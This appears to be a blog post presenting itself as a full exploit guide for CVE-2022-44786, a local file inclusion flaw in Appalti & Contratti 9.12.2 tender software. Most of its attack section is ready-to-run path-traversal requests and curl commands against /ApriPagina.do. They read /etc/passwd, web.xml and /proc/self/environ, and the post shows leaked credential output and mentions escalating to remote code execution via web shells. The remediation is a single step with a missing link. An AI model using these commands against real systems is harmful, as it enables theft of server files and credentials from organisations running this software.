CVE-2022-44786 - Local File Inclusion in Appalti & Contratti 9.12.2 – Full Exploit Guide

In late 2022, a critical security flaw was discovered in the Appalti & Contratti application, version 9.12.2. This vulnerability, tracked as CVE-2022-44786, is a Local File Inclusion (LFI) weakness that can let attackers read sensitive files off the server, sometimes leading to remote code execution.

This guide will walk you through what the flaw is, how it can be exploited, and what you should do about it.

What’s Appalti & Contratti?

Appalti & Contratti (A&C) is a widely-used Italian software for managing public tenders and contracts. Government offices and large organizations run this software to manage official paperwork online.

The Vulnerability: Local File Inclusion via href Parameter

The main problem lies in how the software handles the href parameter in HTTP requests (both POST and GET) to the /ApriPagina.do page. This parameter is meant to let the app pick which JSP (Java Server Page) file to render. But, there’s no validation, so attackers can use it to fetch *any* file on the server.

In Simple Terms

If you control the href parameter, and the app just includes whatever filename you send, you might read secrets like /etc/passwd, server configs, or even app code.

Here’s a basic example using curl. Let’s say the app is running at

http://victim.site/AppaltiContratti/ApriPagina.do

Exploit a Local File Inclusion with a GET Request

GET /AppaltiContratti/ApriPagina.do?href=../../../../../../etc/passwd HTTP/1.1
Host: victim.site

Use curl from your terminal

curl "http://victim.site/AppaltiContratti/ApriPagina.do?href=../../../../../../etc/passwd"

Or with a POST Request

curl -X POST -d "href=../../../../../../etc/passwd" "http://victim.site/AppaltiContratti/ApriPagina.do"

If vulnerable, you’ll get the contents of /etc/passwd

root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

What Files Can Be Hijacked?

The href parameter isn’t limited: you can try to grab anything readable by the web server user.

Examples

- /etc/passwd — Get a list of local users
- WEB-INF/web.xml — Read application configs
- /proc/self/environ — Leak environment variables (sometimes credentials!)

Log files or source code

Danger: In some setups, you can use files like /proc/self/environ or logs to achieve *Remote Code Execution* if you can upload or inject web shells.

Real-World Exploit Example

Suppose the app runs as www-data. You can read PHP/Java configs, credentials, or private company data:

curl "http://victim.site/AppaltiContratti/ApriPagina.do?href=../../WEB-INF/web.xml"

Result (partial)

<web-app>
  ...
  <param-name>db.password</param-name>
  <param-value>SECRET_DB_PASSWORD</param-value>
  ...
</web-app>

Remediation Steps

1. Update: Check the vendor for patches here.

References & Further Reading

- CVE Details: CVE-2022-44786
- Exploit Database Listing
- OWASP Local File Inclusion
- Vendor Site for Appalti & Contratti

Final Words

CVE-2022-44786 isn’t just a theoretical risk. If your organization uses Appalti & Contratti 9.12.2, you need to patch immediately, restrict input, and audit your logs. Local File Inclusion is an old trick, but when left open, it can be devastating.

For defenders: regularly scan your apps, and never trust user input—even if it’s “just a filename.”

Timeline

Published on: 11/21/2022 23:15:00 UTC
Last modified on: 11/23/2022 16:02:00 UTC